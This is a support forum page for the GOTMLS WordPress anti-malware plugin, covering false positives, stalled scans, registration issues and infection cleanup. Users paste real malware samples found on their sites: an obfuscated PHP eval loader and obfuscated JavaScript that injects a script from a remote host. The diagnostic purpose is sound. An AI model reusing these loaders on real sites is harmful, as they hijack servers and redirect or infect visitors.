Here are the recommended channels for receiving support:
- First Read the FAQs - These Frequently Asked Question may have answers that address your issue.
- Forum Topics - There may already be a topic that relates to your problem, if not, you can create one.
- WordPress Forum - If you prefer to use the forum on wordpress.org to get support.
I have scan my website it's looking an alert on gotmls plugin file.
Please check the attached url
https://ibb.co/3Sg0zrd
Thanks for reporting this issue. There was a flaw in the P1EHB definition update that I released last night which led to a lot of False Positives (including in my own plugin files).
I have released a patch in the latest definition update (version P1F3S) that will fix this issue. Please download the new definition updates and let me know if there is anything else I can do.
Thank you for the prompt response and for addressing the issue so quickly. I’ve downloaded the latest definition update (version P1F3S), and I’m happy to report that it’s working perfectly now. The False Positives have been resolved, and everything, including plugin files, is functioning as expected.
I appreciate your swift action in releasing the patch.
I am sorry to bother..can i get access to my account please thank you.
Just click on the "Forgot Password" link under the login form to send a reset password request
The website was attacked, but your plugin identified a potential threat. I used the plugin but stopped at 50% after the threat was detected. The plugin did not remove the malware, but I examined the PHP code and extracted the potential threat below. Can you please assist me? I will definitely donate once I am sure this will work. Here is the identified potential threat in the file: File Details: index.php
in: …/public_html
size: 557 (1 KB)
encoding: UTF-8
permissions: -r–r–r–
Owner/Group: 377891703/1201321712 (you are: 377891703/1201321712)
modified: 2024-06-13 21:38:12
changed: 2025-01-03 12:42:07
Again, download the latest definition updates (version P186Q) to identify and remove this threat.
The bigger problem to figure out is why the scan is getting stuck at 50%, can you check the error Console in your browser? Send me a screenshot if you find anything. Also check the error_log files on your server to see if there are any clues there.
You should also check the access_log files on your server to see what malicious activity might have infected that index.php file at exactly 12:42:07 GMT on 2025-01-03.
I tried to use the plugin but it stopped at 50 % but it indicated that there is a potential threat . How do I remove it ?
<?php
goto JkXv6; TokL9: Fo3w_: goto KxnQV; awgyY: goto D02oj; goto TokL9; ZBVPC: dbQ61: goto XX3Tf; TT9v8: D02oj: goto tJCiR; KxnQV: define("\x57\x50\x5f\125\x53\x45\137\x54\110\105\x4d\x45\x53", true); goto ztzsb; JkXv6: goto Fo3w_; goto ZBVPC; ztzsb: goto dbQ61; goto TT9v8; XX3Tf: eval(str_replace(array("\74\x3f\x70\x68\160\40", "\x3f\x3e"), '', base64_decode(file_get_contents("\x69\156\144\x65\x78\56\x74\170\164"), true))); goto awgyY; tJCiR: require dirname(__FILE__) . "\x2f\x77\160\55\142\x6c\157\x67\55\150\x65\x61\x64\x65\x72\56\160\150\x70";
This is a know threat that is already in my latest definition update. If you register your free key you can then download the latest definition updates and this threat can be properly identified and automatically removed. Without the latest definition updates my plugin can only identify potential threats, which may not always be malicious and therefore they cannot be automatically removed.
Hi, thanks for the awesome plugin!!! I am fixing a clients website which has been blacklisted by google. Your plugin showed no errors, but Sucuri still said there was suspicious code in one of the plugins. I removed the plugin and now its showing no errors.
When I do a complete scan with GOTMLS there are no threats or file changes detected. There is however 3 Scan/Read Errors on 3 php files. Should I be concerned? Could malicious code be situated in these files?
If the scan was unable to read those three files then it is certainly possible that they might contain malicious code, though I would not speculate that it is any more likely than any other files. Does an error show when you hover over any of those files listed that might explain why they could not be scanned?
If you could send me those three files as attachments in a direct email to me then I will check them myself and see if there is any malicious code in them. Maybe I can even figure out why they could not be scanned if I can try to scan them on one of my test sites. You can also send me that plugin which you removed if you still have a copy of those files saved somewhere.
The following file keeps coming up as containing a known threat (on more than one site). However, if I have the plugin automatically fix the file, it completely breaks the given site. I wanted to check if you had anything specific on this before I try doing a more "surgical" fix on the file.
/wp-content/plugins/easy-digital-downloads/includes/admin/promos/notices/class-five-star-review-dashboard.php
Thanks for reporting this. After looking into the code in this file I have confirmed that this was just a False Positive, so this code should not actually match the malicious pattern my plugin was looking for. I have corrected this in the latest definition update. If you can please download the latest definition updates then confirm that this file is no longer incorrectly detected as a threat on your site.
Hello !
I want to do a full scan, but it blocked on "25s elapsed" for hours.
No file has been checked for hours now.
How do I solve that ?
Thanks for your support
I would like to help you figure out what is wrong and find a solution for you but I will need more info. Can you please check your browser's Console for errors on the page and send me a screenshot of the scan in progress with any errors shown in the Console pane.
Your plugin has worked miraculously. Thank you so much! Now that I've run the complete scan and your plugin says there are no longer any threats, I still have thousands of posts that need to be deleted. Do you have an easy way to delete 50,000 blog posts?
I would suggest using an SQL query in PhpMyAdmin (or whatever database tool is provided through your hosting control panel) to delete a bulk quantity of posts. Something like:
The above example assumes that the unwanted posts were injected on the 10th of December and that no other legitimate post were added on that day, so adjust those dates to encompass the desired group of post to be deleted.
Thank so much for your quick response! I will try this.
Hi Eli,
I tried that and somehow related ALL the posts. Is there a way to get them back?
*deleted
What date range did you use?
If they are all truly gone then you will need to restore that table from a backup. Ask you hosting provider if you are not sure where your backups are or how to restore them.
This is the exact code I used: DELETE FROM wp_posts WHERE post_date >= 2024/10/03
The posts all took place on one date so I didnt use a date range. It pretty much wiped out my entire site.
Well, that would be the problem. As my example query showed, the date format needs to be 'YEAR-MONTH-DAY' (separated by dashes) most importantly though, the date string needs to be wrapped in single quotes. Without those quotation mark your value becomes numeric and instead of evaluating a valid date string the query performs a mathematical calculation. Given that you also changed the dashes to slashes you have asked the query to divide 2024 by 10 and then divide the results by 3, which gives you a numeric value of 67.466667, and every post_date in any database is going to by greater than (>) or equal to (=) that value. So if you had changed the >= to be just an = that it would have at least found nothing, but the > sign together with the fact that you dropped the upper date range means that it would find every post.
I am sorry for the confusion here. I guess I should have been more specific about maintaining the exact syntax that I specified in my example. Were you able to get your hosting provider to restore a backup?
Hi,
Do you plan to upgrade the plugin which enables auto-scan & auto-fix based on the schedule setting? If so, when is ETA?
I am still working on a scheduled scan feature. At this point it looks like it will start off being a separate module, as the current scan engine in the plugin requires an interactive browser session in order to run. Once I get the new independent scan module working and have had a good amount of time to test it in the wild then I will likely integrate this feature into the core plugin. I will be sure to let you know when this new feature is ready for testing if you are interested in trying it out as soon as it's available.
Thank you for your reply on the other forum, your quick work at adding the new threat. It found it this time and has quarantined it. Very happy, thank you very much.
Hello, I'd like to make a donation from my account with you but I wonder if it's possible to add many website on the same account as I am a small webmaster.
Thanks
Yes, if you register all your websites using the same email address then they will all be on the same account
hey guys!! I'm speaking here from Brazil, I use this wonderful tool of yours on all my websites… Next! one of them was affected by some type of malware that I have no idea where it came from… the visitor is redirected to other links when using any search engine. google, bing and etc… when I try to run your antimalware through the wordpress panel, I get the following message…
the code that appears when trying to run your antimalware is:
Fatal error: Uncaught TypeError: strlen(): Argument #1 ($string) must be of type string, array given in /home1/my-host/my-domain/wp-admin/css/.f7678ccc.css(94) : eval()'d code:4 Stack trace: #0 /home1/my-host/my-domain/wp-admin/css/.f7678ccc.css(94) : eval()'d code(4): wpgttade (Array) #1 /home1/my-host/my-domain/wp-admin/css/.f7678ccc.css(94): eval() #2 /home1/my-host/my-domain/wp-config. php(4): include_once('/home1/my-host…') #3 /home1/my-host/my-domain/wp-load.php(50): require_once('/home1/my-host …') #4 /home1/my-host/my-domain/wp-admin/admin.php(34): require_once('/home1/my-host…') #5 {main} thrown in /home1/my-host/my-domain/wp-admin/css/.f7678ccc.css(94) : eval()'d code on line 4
tks
This error on your site is being caused by the malware infection. There is malicious PHP code in that CSS file, which would ordinarily not be executable, however it has been included in you wp-config.php file using the this malicious include line that starts with include_once('home1/my-host…
So if you get rid of that include_once that references that CSS file then the error should stop.
how can i register multiple websites? is this feature avaialble?
Yes, you can register as many websites as you want. Just make sure to use the same email address so that they will all be registered to the same account.
I’ve been getting “Password reset” emails constantly for the past few weeks. I would have thought that the “Block XMPRPC” and/or “Brute-force Protection” would take care of this? I double checked with my hosting company, and YES my account is on an Apache server. I get at least 3 or 4 and up to 10 of these per day. I have 61 different sites and they all are using your software. What else can I do?
The "password reset" emails are a function of the login form and has nothing to do with the XMLRPC functions. The Brute-Force Login Protection in my plugin won't interfere with a user attempting to reset their password because it is not a login attempt and the emails sent out will only go to the registered user.
I suggest you add the Advanced Google reCAPTCHA plugin By WebFactory Ltd. It can add protection to the login page and the password reset page as well. Understand that it will be impossible to stop hackers from requesting to reset your password if they mimic using the form like any legitimate user would, without also blocking the legitimate users too. So perhaps it is more important that you focus on the other factor that is allowing them to request your password be reset, the fact that they must know your email or username to make that request. Whether you are using the default "admin" username or some other username that they have discovered it would be more effective for you to simply change the username of any users that are receiving these password reset requests so that these request for the wrong username will fail without ever sending any emails, and then your hackers will also no longer have one half of the info needed to login as that user.
Hi, there. I purchased the plugin in order to be able to scan the core files. But the scan never completes, neither I can get any information about the status. Running for almost 2 days and says 'has not finished'.
Screenshot https://ibb.co/7z4DDss"
Is there anything I can do to make this plugin work ? At the moment it does nothing but I paid for it.
First mark the "Yes" bubble next to "Automatically Update Definitions" and then click "Save". This will download the core file definitions.
Then run the Complete Scan again and stay on the results page until you see the results that need to be fixed. This is an active scan so if you leave the page then it can never finish that scan job. I am working on a Resume feature and an Auto-Scan feature but those are not ready yet so you will need to keep your browser on the scan page to to keep it running and then fix any known threats it finds before leaving that page.
Hi I have other websites that use a different software to wordpress, could this be a cause for malware to enter and affect all my websites, including the ones built on WordPress?
Malware can come through any vulnerability on any site, WordPress or otherwise. The best tools you have for figuring out where the infections are coming from are the log files on your server. There are usually tons of entries in the log files so it is essential to first know the exact time of any infection. Therefore, it is vital to stat any infected file before you delete, modify, or change it in any way. If you can get the most recent modified/changed times of the affected files before you fix them then you can find the relevant actions in the logs that may correspond to those files being infected. If you have already fixed the infections with my Anti-Malware plugin then the infection times can still be found in the Quarantine.
Note: Make sure to accommodate for timezone differences in your calculations, as the Anti-Malware Quarantine stores all time values in GMT/UTC and your server logs might be in the server's local time.
Hi,
I have a question. Obviously I made a donation before running the test which found files and sent to quarantined.
But I tested again via Sucuri (with cache reseted at the bottom of the page) and it found malware that was not detected with GOTMLS.
If it helps you, here is the detail of Suciri's result:
Known javascript malware: malware.injection?35.62
More details:
.lazyload[data-src]{display:none !important;}.lazyload{background-image:none !important;}.lazyload:before{background -image:none !important;}var filjlxtxyoa/*rvxrdwrict*/=/*rvxrdwrict*/eval;/*rvxrdwrict*/var ytwfy/*rvxrdwrict*/=/*rvxrdwrict*/atob; filjlxtxyoa(ytwfy("d"+/*rvxrdwrict*/"mFy"+/*rvxrdwrict*/"IGNjPTE7d"+/*rvxrdwrict*/"mFy"+/*rvxrdwrict*/"IGQ"+/*ouibk*/" 9ZG9jd"+/*rvxrdwrict*/"W1lbnQ"+/*ouibk*/"7Y2M9Mjt2YXIgcz"+/*kpkv*/"1kLmNy"+/*rvxrdwrict*/"ZWF0"+/*kpkv*/"ZUVs"+/* ouibk*/"ZW1lbnQ"+/*ouibk*/"oInNjcmlwd"+/*rvxrdwrict*/"CIpO2NjPTM7cy"+/*rvxrdwrict*/"5"+/*ouibk*/"z"+/*kpkv*/"cmM9J2h0 "+/*kpkv*/"d"+/*rvxrdwrict*/"HBz"+/*kpkv*/"Oi8vc2Vy"+/*rvxrdwrict*/"d"+/*rvxrdwrict*/"mljZS5"+/*ouibk */"z"+/*kpkv*/"cGVjaWFs"+/*ouibk*/"Y3JhZnRib3guY29tL2g0"+/*kpkv*/"YmZMSCc7Y2M9NDtkLmd"+/*rvxrdwrict*/"ld"+/*rvxrdwrict*/"EVs" +/*ouibk*/"ZW1lbnRz"+/*kpkv*/"Q"+/*ouibk*/"nlUYWd"+/*rvxrdwrict*/"OYW1lKCd"+/*rvxrdwrict*/"oZWFkJy"+/*rvxrdwrict* /"lbMF0"+/*kpkv*/"uYXBwZW5"+/*ouibk*/"kQ"+/*ouibk*/"2hpbGQ"+/*ouibk*/"ocy"+/*rvxrdwrict*/"k7") );
thank you for your help.
It looks like my plugin has actually already removed this threat for you.
I checked those Sucuri results and the malware shown there was in fact cached from a scan that they ran over 14 hours ago. At the bottom of the page it said:
Scanned 14 hours ago. Force a Re-scan to clear the cache.
I click on the Re-scan link and the scan came back clean. Please let me know if you have any further concerns.
Hello. i have an issue (problem). When i clic on scan start button, it doesn't work. it says this page doesn't work. in french. please help me.
This is probably caused by a bug in another plugin or some malicious code that is breaking the page whenever you POST form data to your site. You will first need to check the error_log files on your server to see what code is causing this error and then you can correct that code to proceed with the Malware Scan and/or any other POST forms.
Let me know what errors you find and I can help you make sense of them and decide how best to fix it.
Hi,
We are getting Malware on the site from the Unlimited Element
plugin. When checking it seems clean.
please check this screenshot – https://share.zight.com/jku8rKxk
Thank you.
Thanks for reposting this False Positive. I have confirmed that this plugin is not a threat and updates my malware definitions to exclude this code. Please download the latest definition updates and make sure that it is no longer flagging these files on your server.
There is a file with an infection in the site folder [URL redacted for security reasons] and the check can't find it.
Thank you for sending me this infected file that was not detected. I have added this new variant to my definition updates so that it can now be automatically fixed. Please download the latest definition updates and run the complete scan again to see if it finds any more like this one.
Hi,
My website is affected by malware and affected files are:
/home4/najlanco/public_html/backup/wp-includes/header.php: SL-PHP-FILEHACKER-iu.UNOFFICIAL FOUND
/home4/najlanco/public_html/wp-content/themes/skeleton-reworked/404.php: SL-PHP-FILEMANAGER-md5-gcy.UNOFFICIAL FOUND
/home4/najlanco/public_html/wp-content/themes/skeleton-reworked/functions.php: SL-PHP-FILEHACKER-iu.UNOFFICIAL FOUND
/home4/najlanco/public_html/wp-content/themes/joly/functions.php: SL-PHP-FILEHACKER-iu.UNOFFICIAL FOUND
/home4/najlanco/public_html/wp-content/plugins/trx_updater/assets/wp-load.php: SL-PHP-FILEMANAGER-md5-gcy.UNOFFICIAL FOUND
/home4/najlanco/public_html/wp-config.php: SL-PHP-FILEHACKER-dui.UNOFFICIAL FOUND
while using Anti-Malware it will detect all of these files but not sure how to fix that.
Can you please help me on that.
Thank you
Did you download the latest definition updates?
If you are scanning for all threat type with the latest definition updates (not just Potential Threats) then my plugin will offer to fix those Known Threats for you automatically.
I am a happy donor to the plugin with many sites using the plugin. I have 3 sites that ALWAYS get stuck at 99% and never progress to completion. I'm working with those sites now, trying full scans one more time. I'll switch and try other levels of scanning, but I'd really like to be fully confident that EVERYTHING is getting checked and is clear of problems. Any suggestions or support on this would be very much appreciated.
I have just released a new plugin update (version 4.21.94). Please download the new update and let me know if that fixed the issue for you or not?
The latest version of the plugin is completing quickly! Thank you for the fix, and thank you for the great product and service!
How can i have a invoice ?
como puedo tener un recibo de la donación?
You can find your invoice on your Profile page. Just login to https://gotmls.net/members/ and click on the link under "Invoice Details"
Hello support, I found the Malware using your plugin – thank you very much. Hoever, now I do not know how to get rid of it? Can you tell me what to do from here, please. My host is Siteground.
I don’t see a Registration for your site so you must be running the basic scan which will only identify “Potential Threats”. Do you see all the warnings in Red telling you to download the latest definition updates?
Once you download the latest definitions then you can run the Complete Scan again to find any “Known Threats” which the plugin will offer an option to Automatically fix them for you.
My error log is spitting out multiple errors everyday:
[03-Jul-2023 19:46:28 UTC] PHP Warning: Undefined array key "detected_attacks" in /home/public_html/wp-content/plugins/gotmls/safe-load/wp-login.php on line 63
can you fix this? Im using Version 4.21.92
Thanks for reporting this to me. I will have that fixed in my next plugin update which should be soon.
If you want to fix your copy now you can add these two lines of code to your plugins/gotmls/safe-load/wp-login.php file right after $GLOBALS["GOTMLS"] = array(); on line 10:
if (!isset($GLOBALS["GOTMLS"]["detected_attacks"]))
$GLOBALS["GOTMLS"]["detected_attacks"] = ";
I think i already fixed the issue. Thank you so much for this great plugin! I donated $29
That's great! I'm so glad you got it all clean, and thanks for the donation
Hi there my champion friend
Please send me a donation link, where ill donate some more cash for you.
Also, what is the brute force settings? Can i edit? What is the lockout parameter.
Steve
The Brute-Force Login Protection works by establishing a persistent session with the client's browser. Failure to establish a a valid session or more than 3 login attempts on the same session will redirect the connection so that your WP Bootstrap doesn't even load thus relieving your server of the burden of processing these attacks. This Feature can be enabled in the firewall options after a donation but it is not configurable without modifying the plugin's source code.
Hi,
After plugin install there is index.php file in all subdirectories. I know that this is for security reasons as this disable directory browsing.
Is there any option to disable it? Or disable it for specific directory. Problem is that in another subdirectory is additional site which uses Wordfence which see this file as a threat.
Best regards,
Miha
These new index.php files have nothing to do with my plugin. My Anti-Malware plugin does not create index.php files in every directory. Wordfence is probably correct in reporting that these files are a threat, but just to be sure, can you please email me a few of these files so that I can confirm that they are a known threat?
Hi Anti-Malware Admin
can you whitelist this lines please
:
DirectoryIndex index.php Default.htm index.html home.html welcome.html default.html index.htm home.htm welcome.htm default.htm index.php3 index.shtml home.shtml index.cgi home.cgi home.wml index.wml index.php4 home.php4 index.php5 index.php6 baustelle.html Index.html Index.htm
… I get everytime a heartattack ^^ (Whitelist File is not a option, because it´s in the .htaccess File)
best regards
serdar
Absolutely! I see that is a legitimate use of an alternative DirectoryIndex list and not at all malicious, so thanks for pointing it out. I have just updated my definition to exclude this usage from the list of known .htaccess threats. Please download the latest definition updates and let me know if that fixes it for you.
You are AWESOME
it works now without heartattack XD
so i can continue to tell my friends that your plugin is the best virus scanner for WP
Hi, I get in WordPress the following message: Your Installation Key is not registered!
But when I look in my profile I see the installation key and website as registered.
This is usually caused by some kind of caching which prevents your wp-admin page from properly refreshing to show you the current registration info. Sometime the registration check in your wp-admin can also be blocked by your browser's security setting or some kind of script blocker add-on. Check the Console tab in your browser's Inspector for any security warnings or JavaScript errors, and/or try disabling any caching plugins. This might also clear up automatically given enough time, if it is a caching issue.
i get attacked permanently and it is very intense to clean it every time … but these codes was not flagged as shady code Oh …
please update the plugin, i´m not sure that i find everything -.-
Thanks for sending me the Dropbox link with those files. I have added all three of these new variants to my malware definitions. Please download the latest definition updates and run the Complete Scan again to see if there are any more. Please let me know if you find anything else.
Hello,
My sites keep getting infected with "Redirect" malware. I remove them with your plugin every day but next day the malwares keep coming back
Do you have any suggestions for me please?
There is clearly still some vulnerable exploit on your server that is letting hackers reinfect these same files over and over again.
The best way to find and fix this security whole is to start by getting the exact time of the infect. If you have already cleaned this infection at least once then there will be a record of the infection times on the Anti-Malware Quarantine page in your wp-admin. Once you have the exact times of these infections then you can simply cross-reference those times in the raw access_log files on your server. This will tell you what scripts or URLs were called to infect those files, and that will point you to the file that is vulnerable to this exploit.
Ask your hosting provider is your not sure where the log files are kept on your server.
I had a persistent malware infecting multiple sites on my hosting account.
Checking the rest of my site settings, I found that it had created CRON jobs to automatically reinfect itself!
I deleted those today… hoping that's an end to it – have to wait & see!
Hola estimado,
tengo problemas para eliminar un archivo que según el diagnóstico es un Error de exploración/lectura.
Este archivo está terminado en php.
No me aparece la opción de eliminar.
Un error de exploración/lectura no es un virus, por eso no hay opción de eliminación.
Este tipo de error solo significa que el escáner no pudo leer el archivo. Por lo tanto, no hay forma de saber si el archivo contiene un virus o no.
Can you solve those Japanese words attract issue if I buy your plugin?
There is nothing inherently wrong with Japanese words. Many Japanese website contain mostly Japanese words and those are predominately ok to visit if you can read Japanese
Now, if you have malware or maliciously inserted ads, that happen to be in Japanese, my plugin should be able to remove the scripts that inserted this malicious content, regardless of what language it's in.
If you have already installed my plugin and downloaded the latest definition update and it is not finding any known threats on your site then please email me directly with screenshots of the offending content for further support.
Hello Eli… thank you for creating this tool and very happy to make the donation for your work. I have problems of unsolicited redirection of my web page and I already run the plugin without results. Can you help me see what is happening please?
Thank you Eli.. your tool finally solved my problem with the website.. thank you very much and I'm glad I found you to have my site protected and safe from malware. We sailors say Bravo-Zulu which means very well done…!!
I cant update:
No response from the server!
Please help me
The error "No response from the server" refers to the fact your server is not responding when prompted to check for updates or registration status. This is usually caused by a too strict CSP on your server or a popup/script blocker on your browser. Try clearing your cache and then open the Console tab in your browser's Inspector and refresh the page to see if there are any JavaScript error to indicate what might be causing this issue in your case. If you need more help then please contact me directly with your specific circumstances.
I downloaded your plugin and received the key. I then did a scan and everything worked fine. A couple of weeks later, I went to my installed plugins but your plugin was not there. Can I install the plugin again and use the original key?
Once you have registered your site key will stay the same even if you uninstall and reinstall the plugin
I install the plugin
in my profile it show as register, but plugin in wp show as not register.
could any body help me?
br
This is usually caused by a caching issue or a JavaScript error on the client side. Please try clearing all cache and refreshing you wp-admin, then check your browser's Console for errors if it still does not show the registration on your end.
Send me a screenshot if you can't figure out what's wrong.
Hi – I'm very interested in Gotmis. Is your firewall DNS, with DDoS protection and CDN? Does it feature an SSL-secured firewall and block unauthorized IP addresses? And if not, could I use your plugin along with another plugin or related product (such as GoDaddy's security software) with the above features, without interference? Or does Gotmis cover those bases in a different way?
Only your nameservers can provider DNS level firewall protection, I recommend using CloudFlare DNS for that. My Brute-Force login protection was specifically designed to thwart the DoS and DDoS affects that are common from brute-force attacks on the wp-login page. I do not employ any method of blocking IP addresses specifically because most attacks are from dynamic sources and blocking users by IP usually ends up with too many false positives. The main focus of my firewall is to block known exploits that are prevalent in WordPress sites and you should be able to use any other firewall in conjunction my plugin to enhance or augment your site's security.
Hi – I'm very interested in your plugin, etc., and truly appreciate your labor and thoughtfulness in creating this plugin and making it so easily available. I will probably download & install it soon – though I hope to receive a reply from you first.
Although perhaps my concern is misplaced – considering the quality of your reviews! – I'd be a bit more comfortable if your home page were secure (https) before entering my info. (including my alternate email address) to request instant updates. RSVP – Thank you!
Thanks for your interest. All the pages on my site are avail as both secured URLs (using HTTPS) and unsecured URLs (using only HTTP), this is for better compatibility and integration with links that only use HTTP. However, you can simply add an S to the HTTP at the beginning of any URL on my site and the HTTPS URL makes the page secure
Your donate link is dead?
https://gotmls.net/donate/
That page works fine for me and I can find nothing wrong there. You do need to enter your key or login to see the donation options on that page though. If you cannot get it to work then please send me a screenshot so that I can see what you are having trouble with.
Works for me too now
I just donated and wanted to change the user name (personal email) to reflect in plugin on my site, Do I need to remove and reinstall with my donated user name? I do note see a way to change user names.
Thanks for 5 great years of keeping my sites healthy.
The best way to fix this is to login to your wp-admin and click on the key in the top-right of the Anti-Malware Settings page to open the pre-filled registration form. Then make sure to submit the right email on that form and it will re-register the key for that site under your correct email. Then any other sites registered under that email address will also reflect your donation.
Hello, we have a licence but the data base definitions never auto update, we have to do it manually, is there a way to fix that? thanks in advance and congrats for the great work!
Sorry for the lateness of my reply, your comment went to my spam folder and I almost missed it. I recently had another report about this same thing happening to someone else too. I think that this might be a caching issue in which the updates are taking place in the background but just not showing up immediately in your wp-admin. If this happens again can you please try simply clearing your cache and refreshing the page to see if it then shows that your definitions are up-to-date? If not then please send me a screenshot and include your registration key so that I can look into this further on my end.
Just moved web site to new host. How do I transfer registration?
Just register your new key to the same email address and your registration will be on the same account.
hi, scan details disappears if i click auto fix or refresh page eg.. i have to scan again to get the infected files again and takes long time. and auto fix seem not to work even when click button taking to long time. any ideas?
If you refresh the scan results page then the scan will start all over so don't do that until you're done or want to rerun the scan. The automatic fix should popup a new window without leaving the scan results and if it's taking too long then there is a button you can push to see if there are any error messages that might explain why it's not finishing as expected. If the complete scan is taking a veryl ong time anyway then there might be something wrong on your server that is slowing everything down. You can check the error_log files on your server to see if there is any indication as to what might be causing that problem. If you can email me some screenshots of the scan results and the auto-fix and any error messages you might find then I can help you more.
the error message is just number: 1
here is a screenshoot https://ibb.co/7ktc0rG
That number 1 is not coming from my plugin. It looks like there is some other plugin that is intercepting the call to admin-ajax.php or maybe there is some other script that is injecting an additional action into the HTML output of my Auto-Fix form so that the auto-fix action is being hijacked and diverted to another action hook.
You can try deactivating other security plugins or any other plugin that might be interfering to see if the auto-fix works without interference, or you could use the element inspector in your browser to look for additional hidden fields with the name "action" in the auto-fix form that might have been added.
Hi,
Keep getting this message:
'Your Installation Key is not registered!'
Also console errors:
Uncaught ReferenceError: WebFont is not defined
at admin.php?page=GOTMLS-settings:939
and
Refused to display 'https://gotmls.net/' in a frame because it set 'X-Frame-Options' to 'sameorigin'.
I just release a new version of the plugin that does not use an iframe for the registration form, so if you update the plugin then you should be able to register.
that other error about the WebFont has nothing to do with my plugin (I don't use any WebFonts in my code) so that must be caused by some other plugin that is trying to use a WebFont in your wp-admin.
Hi Eli,
longtime since we last chatted. I am getting the following error:
Invalid or expired Nonce Token! (0161b6df4fcd5827b89547020f7c2ff4 !found)Refresh and try again?
any advice would be appreciated.
David
Thanks for asking about this issue. Usually this is caused by leaving your browser open on the Scan Setting page for a long time before starting the scan (and by then the token really has expires). Just refresh the page and try to start the scan again and it should work fine.
If you are still getting this message after a hard refresh then there may be something wrong with your site. Either there is some plugin or caching software that is caching your wp-admin pages (never a good idea) or maybe your DB is broken and my plugin is not able to save new records to the wp_options table. Test those two possibilities and let me know if you still have any more problems with that error.
Hi,
I have the same problem with the invalid or expired token too.
any refresh of page took me back the first step to a get free key. when I click to get the key it finds my correct key but when I want to start scanning or save the page it says it is invalid….
I have cleared the cache, changed the browser, also checked whit a new device but still not successful.
Is this issue raised for guys with 1 donate for many websites?
This issue has nothing to do with your donation. Your sites are registered and the keys are saved on my end.
The invalid nonce token issue you are having, combined with your site's inability to save the registration key on your end, suggests that your server is not able to save records to the wp_options table in your database. This is usually caused a missing or incorrect AUTO_INCREMENT setting in your table, or it could be that your whole database is read-only (either because of a permission issue or no space left on the partition.
Try manually adding a record to your wp_options table and see what the AUTO_INCREMENT Id value is. You can also email me directly if you need more support.
Hi, I have several websites that have the WP-VCD malware.
I have used your plugin and it deletes infected files. but then a day or so later its back?
Any ideas please?
There must still be a vulnerability on your server that is letting this hacker replace those malicious files on your site just as they did the first time. If your site is clean but the vulnerability is on the server side then you may need to move your site to a more secure hosting environment. You could also ask your hosting provider what they can do to stop these repeated infections but many time the hosting support is not that helpful in these types of situations.
Hello Eli,
I had 4 registrations using your plugin, donated 4 times and I wanted to reinstall the plugin on my website after I moved it to a new server. I clicked unregister thinking that will allow me to do that … but it deleted the key all together. Can you please help. I cannot figure out how to register my new installation.
Mahmoud
Just click "Get FREE Key" and register that new key under the same email address and it will show your donation. Be sure to refresh you wp-admin if it doesn't show up right after you re-register, and you might need to clear your cache if you browser does not show any changes on your Anti-Malware Setting page.
If i donate and upgrade my account, i will be able to use in multiple websites or just in one website?
One donation will unlock the current premium features on all sites that are registered under the same email account